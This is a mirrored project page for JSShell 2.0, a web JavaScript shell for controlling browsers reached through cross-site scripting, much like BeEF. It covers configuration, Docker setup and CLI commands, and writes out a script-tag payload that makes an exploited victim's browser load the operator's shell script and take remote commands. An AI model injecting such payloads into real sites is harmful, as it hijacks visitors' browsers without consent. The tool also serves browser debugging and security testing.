GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → Den1al → Jsshell

Den1al / Jsshell

Licence: mit
An interactive multi-user web JS shell

Programming Languages

javascript
184084 projects - #8 most used programming language
python
139335 projects - #7 most used programming language
shell
77523 projects

Labels

webexploitinteractivexss

Projects that are alternatives of or similar to Jsshell

V3n0m Scanner
Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
Stars: ✭ 847 (+156.67%)
Mutual labels:  exploit, xss
Hackvault
A container repository for my public web hacks!
Stars: ✭ 1,364 (+313.33%)
Mutual labels:  exploit, xss
Shellen
🌸 Interactive shellcoding environment to easily craft shellcodes
Stars: ✭ 799 (+142.12%)
Mutual labels:  exploit, interactive
Jsshell
JSshell - JavaScript reverse/remote shell
Stars: ✭ 167 (-49.39%)
Mutual labels:  exploit, xss
xss-http-injector
XSS HTTP Inject0r is a proof of concept tool that shows how XSS (Cross Site Scripting) flags can be exploited easily. It is written in HTML + Javascript + PHP and released under GPLv3.
Stars: ✭ 22 (-93.33%)
Mutual labels:  exploit, xss
Commodity Injection Signatures
Commodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT
Stars: ✭ 267 (-19.09%)
Mutual labels:  exploit, xss
Pythem
pentest framework
Stars: ✭ 1,060 (+221.21%)
Mutual labels:  exploit, xss
Angularjs Csti Scanner
Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
Stars: ✭ 214 (-35.15%)
Mutual labels:  exploit, xss
cve-2016-1764
Extraction of iMessage Data via XSS
Stars: ✭ 52 (-84.24%)
Mutual labels:  exploit, xss
APSoft-Web-Scanner-v2
Powerful dork searcher and vulnerability scanner for windows platform
Stars: ✭ 96 (-70.91%)
Mutual labels:  exploit, xss
Penetration testing poc
渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
Stars: ✭ 3,858 (+1069.09%)
Mutual labels:  xss, exploit
Php Console
🖥 PHP CLI application library, provide console argument parse, console controller/command run, color style, user interactive, format information show and more. 功能全面的PHP命令行应用库。提供控制台参数解析, 命令运行,颜色风格输出, 用户信息交互, 特殊格式信息显示
Stars: ✭ 310 (-6.06%)
Mutual labels:  interactive
Nginx Lua Anti Ddos
A Anti-DDoS script to protect Nginx web servers using Lua with a HTML Javascript based authentication puzzle inspired by Cloudflare I am under attack mode an Anti-DDoS authentication page protect yourself from every attack type All Layer 7 Attacks Mitigating Historic Attacks DoS DoS Implications DDoS All Brute Force Attacks Zero day exploits Social Engineering Rainbow Tables Password Cracking Tools Password Lists Dictionary Attacks Time Delay Any Hosting Provider Any CMS or Custom Website Unlimited Attempt Frequency Search Attacks HTTP Basic Authentication HTTP Digest Authentication HTML Form Based Authentication Mask Attacks Rule-Based Search Attacks Combinator Attacks Botnet Attacks Unauthorized IPs IP Whitelisting Bruter THC Hydra John the Ripper Brutus Ophcrack unauthorized logins Injection Broken Authentication and Session Management Sensitive Data Exposure XML External Entities (XXE) Broken Access Control Security Misconfiguration Cross-Site Scripting (XSS) Insecure Deserialization Using Components with Known Vulnerabilities Insufficient Logging & Monitoring Drupal WordPress Joomla Flash Magento PHP Plone WHMCS Atlassian Products malicious traffic Adult video script avs KVS Kernel Video Sharing Clip Bucket Tube sites Content Management Systems Social networks scripts backends proxy proxies PHP Python Porn sites xxx adult gaming networks servers sites forums vbulletin phpbb mybb smf simple machines forum xenforo web hosting video streaming buffering ldap upstream downstream download upload rtmp vod video over dl hls dash hds mss livestream drm mp4 mp3 swf css js html php python sex m3u zip rar archive compressed mitigation code source sourcecode chan 4chan 4chan.org 8chan.net 8ch 8ch.net infinite chan 8kun 8kun.net anonymous anon tor services .onion torproject.org nginx.org nginx.com openresty.org darknet dark net deepweb deep web darkweb dark web mirror vpn reddit reddit.com adobe flash hackthissite.org dreamhack hack hacked hacking hacker hackers hackerz hackz hacks code coding script scripting scripter source leaks leaked leaking cve vulnerability great firewall china america japan russia .gov government http1 http2 http3 quic q3 litespeedtech litespeed apache torrents torrent torrenting webtorrent bittorrent bitorrent bit-torrent cyberlocker cyberlockers cyber locker cyberbunker warez keygen key generator free irc internet relay chat peer-to-peer p2p cryptocurrency crypto bitcoin miner browser xmr monero coinhive coin hive coin-hive litecoin ethereum cpu cycles popads pop-ads advert advertisement networks banner ads protect ovh blazingfast.io amazon steampowered valve store.steampowered.com steamcommunity thepiratebay lulzsec antisec xhamster pornhub porn.com pornhub.com xhamster.com xvideos xvdideos.com xnxx xnxx.com popads popcash cpm ppc
Stars: ✭ 295 (-10.61%)
Mutual labels:  exploit
Vbscan
OWASP VBScan is a Black Box vBulletin Vulnerability Scanner
Stars: ✭ 295 (-10.61%)
Mutual labels:  exploit
Android Exploits
A collection of android Exploits and Hacks
Stars: ✭ 290 (-12.12%)
Mutual labels:  exploit
Armpwn
Repository to train/learn memory corruption on the ARM platform.
Stars: ✭ 320 (-3.03%)
Mutual labels:  exploit
Constellation
A graph-focused data visualisation and interactive analysis application.
Stars: ✭ 309 (-6.36%)
Mutual labels:  interactive
Javacodeaudit
Getting started with java code auditing 代码审计入门的小项目
Stars: ✭ 289 (-12.42%)
Mutual labels:  xss
Pwn2exploit
all mine papers, pwn & exploit
Stars: ✭ 289 (-12.42%)
Mutual labels:  exploit
Ink
🌈 React for interactive command-line apps
Stars: ✭ 17,505 (+5204.55%)
Mutual labels:  interactive
View All Similar Projects ➔

JSShell 2.0

made-with-python Generic badge Generic badge

An interactive multi-user web based javascript shell. It was initially created in order to debug remote esoteric browsers during experiments and research. This tool can be easily attached to XSS (Cross Site Scripting) payload to achieve browser remote code execution (similar to the BeeF framework).

Version 2.0 is created entirely from scratch, introducing new exciting features, stability and maintainability.

Version: 2.0

Author

Daniel Abeles.

Shell Video

asciicast

Features

  • Multi client support
  • Cyclic DOM objects support
  • Pre flight scripts
  • Command Queue & Context
  • Extensible with Plugins
  • Injectable via <script> tags
  • Dumping command output to file
  • Shell pagination
  • HTTPS support! Generic badge

Installation & Setup

Config File

In the resources directory, update the config.json file with your desired configuration:

  • Database host - if running with the docker deployment method, choose the database host as db (which is the internal host name).
  • Return URL - the URL which the requests will follow. The shell.js file does some AJAX calls to register and poll for new commands. Usually it will be http[s]://{YOUR_SERVER_IP}:{PORT}.
  • Startup script - a script that runs automatically when the JSShell CLI client is spawned.
  • Domain - if you desire to generate TLS certificates, this is the domain name the server will use.
  • It is also possible to point at a remote database if desired.

Let's Encrypt

Now JSShell supports TLS, which means you can now generate TLS certificates and feed them to the web server. The web server will infer the domain name from the config.json file. In order to create the certificate, use the create_cert.py script in the scripts folder:

$ cd scripts
$ python create_cert.py --domain <YOUR_DOMAIN> --email <YOUR_EMAIL>
the email field is optional.

Please note that the web server must be down in order for the script to function properly. At this point, we have successfully generated our certificates! The sole modifications we need to do are:

  • In the config.json file, change the schema of the URL field to https.
  • In the docker-compose.yml file change the exposed port of the web container to 443.

Docker

This new version supports installing and running JSShell via docker and docker-compose. Now, to install and run the entire JSShell framework, simply run:

$ ./scripts/start_docker_shell.sh

This will:

  • Start and create the database in the background
  • Start the web API server that handles incoming connections in the background
  • Spawn a new instance of the JSShell command line interface container

Regular

If you still want to use the old fashion method of installing, simply make sure you have a MongoDB database up and running, and update the config.json file residing in the resources directory.

I recommend using a virtual environment with pyenv:

$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv

Or using virtualenv:

$ virtualenv -p python3.6 venv
$ source venv/bin/activate

Then, install the requirements:

$ pip install -r requirements.txt

Running

If you used the docker method, there's no need to run the following procedure.

Web Server

Otherwise, once we have the database setup, we need to start the web API server. To do, run:

$ python manage.py web

This will create and run a web server that listens to incoming connections and serves our JSShell code.

Shell

Now to start the JSShell CLI, run the same script but now with the shell flag:

$ python manage.py shell

Usage

After setup and running the required components, enter the help command to see the available commands:

     ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
     ║╚═╗└─┐├─┤├┤ │  │  
    ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0     
        by @Daniel_Abeles
    
>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit                Edit a file in a text editor
help                List available commands or provide detailed help for a specific command
history             View, run, edit, save, or clear previously entered commands
ipy                 Enter an interactive IPython shell
py                  Invoke Python command or shell
quit                Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back                Un-select the current selected client
clients             List and control the clients that have registered to our system
commands            Show the executed commands on the selected client
dump                Dumps a command to the disk
execute             Execute commands on the selected client
select              Select a client as the current client

>>

Flow

JSShell supports 2 methods of operation:

  1. Injectable Shell (similar to BeeF framework)
  2. Hosted Shell (for debugging)

Injectable Shell

Similar to other XSS control frameworks (like BeeF), JSShell is capable of managing successful XSS exploitations. In example, if you can inject a script tag, inject the following resource to your payload, and a new client will appear in your console:

<script src="http[s]://{YOUR_SERVER_IP}:{PORT}/content/js"></script>

Hosted Shell

If you desire to debug exotic and esoteric browsers, you can simply navigate to http[s]://{YOUR_SERVER_IP}:{PORT}/ and a new client will pop up into your JSShell CLI client. Now it is debuggable via our JSShell console.

Credits

Canop for JSON.prune

use it at your own responsibility and risk.
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].